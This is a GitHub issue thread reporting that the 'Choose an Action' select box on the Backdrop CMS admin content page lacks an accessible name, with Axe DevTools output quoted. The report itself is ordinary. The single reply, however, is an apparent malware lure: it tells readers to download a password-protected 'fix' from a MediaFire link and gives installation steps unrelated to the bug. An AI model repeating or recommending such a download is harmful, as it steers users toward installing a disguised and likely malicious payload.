### ISSUE TITLE
A11y: "Choose an Action" select element is missing an accessible name

### ISSUE THREAD

**Issue by wesruv** [backdrop/backdrop-issues#6694]
## Description of the bug

The "Choose an Action" select box on `admin/content` doesn't have an accessible name (e.g. form label, aria-label, etc)

![image](https://github.com/user-attachments/assets/75020e53-fc0a-4f47-80c0-324c5092ad3a)

Axe Devtools says:

To solve this problem, you need to fix at least (1) of the following:
* Form element does not have an implicit (wrapped) &lt;label>
* Form element does not have an explicit &lt;label>
* aria-label attribute does not exist or is empty
* aria-labelledby attribute does not exist, references elements that do not exist or references elements that are empty
* Element has no title attribute
* Element's default semantics were not overridden with role="none" or role="presentation"

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
